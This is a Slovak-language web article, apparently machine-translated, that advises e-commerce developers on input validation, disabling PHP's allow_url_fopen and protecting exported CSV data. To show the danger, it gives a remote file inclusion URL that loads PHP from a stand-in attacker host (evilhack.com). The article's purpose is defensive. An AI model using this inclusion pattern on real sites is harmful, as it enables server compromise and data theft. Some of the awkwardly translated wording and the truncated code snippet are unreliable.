E-Commerce Security - Pripojenie bezpečnostné diery

Bezpečnosť v e-commerce internetových stránkach musia byť jedným z najdôležitejších aspektov pri rozvoji e-commerce webovej stránky alebo softvér. Developer musí byť vedomí všetkých bezpečnostných otázok pri návrhu webu. S e-commerce čoraz bežnejšie v týchto dňoch, počet útokov na zabezpečenie, je určite rastie. Paranoja je zdravá vec, pre e-commerce site vývojárov, musíme držať krok k bráne s bezpečnostnými problémami, a aby naše uši a oči otvorené. Hoci tieto medzery sú závažné, ak sú prítomné tieto medzery sú ľahko opraviť.

Nižšie sú niektoré bezpečnostné aspekty, ktoré majú byť zahrnuté pri vývoji webu. Tento článok sa nevzťahuje na e-krádeže v obchodoch, prosím, pozri môj samostatný článok o tomto.

Užívateľský vstup - každý vstup, či už so zadaním množstva, vyhľadávanie produktov, zadaním názvu, atď, musí byť overená pre podozrivé osoby. Ak to uskutočniť, je možné zadať "?>", uzatváracie koncovej značky PHP a spustiť nejaký kód PHP.

Je oveľa bezpečnejšie povoliť čísiel a znakov az (vrátane miest) a 0-9 a nič iného, ako vytvoriť zoznam všetkých znakov, ktoré by nemali byť. Validačný skript musí prechádzať každý znak jeden po druhom. To je potrebné dosiahnuť s použitím pri validáciu na strane servera, nie Javascript. Použitie na strane servera overovanie vstupu je potrebné, aby sa nežiaduce znaky

Existuje ďalší zásadný pri vykonávaní PHP kódu. Pri použití PHP je nastavenie tzv allow_url_fopen, ktorá umožňuje otváranie súborov z PHP skriptu. Toto nastavenie by mali byť vypnuté, nie je absolútne nevyhnutné.

Len si predstavte, máte PHP skripty pre pevné hlavičky a päty, a prístup k vašej webovej stránky, zadajte príkaz v http://www.mysite.com/index.php?page=page2. Stačí sa používateľ so zlými úmyslami spustit skript zmenou týchto parametrov príkazom "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" s nejaký PHP kód v súbore "hacker.txt". Dalo by sa niečo stalo, PHP súbory čítať, mazať, ukradol dôležité informácie.

Ak si nie ste istí, či je toto nastavenie zapnúť alebo vypnúť, skopírujte prosím nasledujúci PHP kód do textového súboru a nahrať ju na svoj webový server:

phpinfo ();
?>

Prejdete Ak váš scenár na svoj webový server, mali by ste naraziť na nastavenie allow_url_fopen v konfigurácii.

Používateľ počítača, môže za normálnych okolností, ktoré nemožno zistiť hodnotu tohto nastavenia.

Buďte opatrní vyvážaných dáta ako príkazy, výrobky vo formáte CSV súbory a mySQL. Ak je táto dáta sa vyváža zo skript a je vedený na webovom serveri pod spoločnou tj názov súboru. http://www.mysite.com/admin/output_tables.csv. To je len naozaj problém, keď vyvážané dáta uložené v súbore v adresári, ktorý je verejne prístupný. K dispozícii sú dva spôsoby, ako zabrániť tejto bezpečnostné riziko - Prvý výstupný súbor má za sebou adresár chránený heslom, za druhé sa dáta nachádzajú vnútri formulára HTML textarea element na skript. Majiteľ obchodu potom skopírovať informácie z textového súboru a vytvorte nový súbor na svojom počítači a vložte informácie nájdete tu.

Stačí hacker nájsť tento súbor kontrolou z e-commerce software demo internetovej stránky a pozrite sa rovnakým názvom na skutočnom mieste.

Rate Article

Related Videos
Play Video How to Strengthen Network Security with Cisco Network Manager	Play Video Understanding your Home Network Router #5 - Secure Your Network with WPA2	Play Video Learn About Secure Computing	Play Video Ako na Keep Your Computer Bezpečná	Play Video Ako Skontrolujte nastavenia zabezpečenia v systéme Windows Vista

Nižšie uvedené sú viac článkov, súvisiace s vyššie uvedeným článkom z "Elektronický obchod" článok kategórie.

Záujemcovia v uvedenom článku "E-Commerce Security - Pripojenie bezpečnostné diery" sú tiež záujem na súvisiace články uvedené nižšie: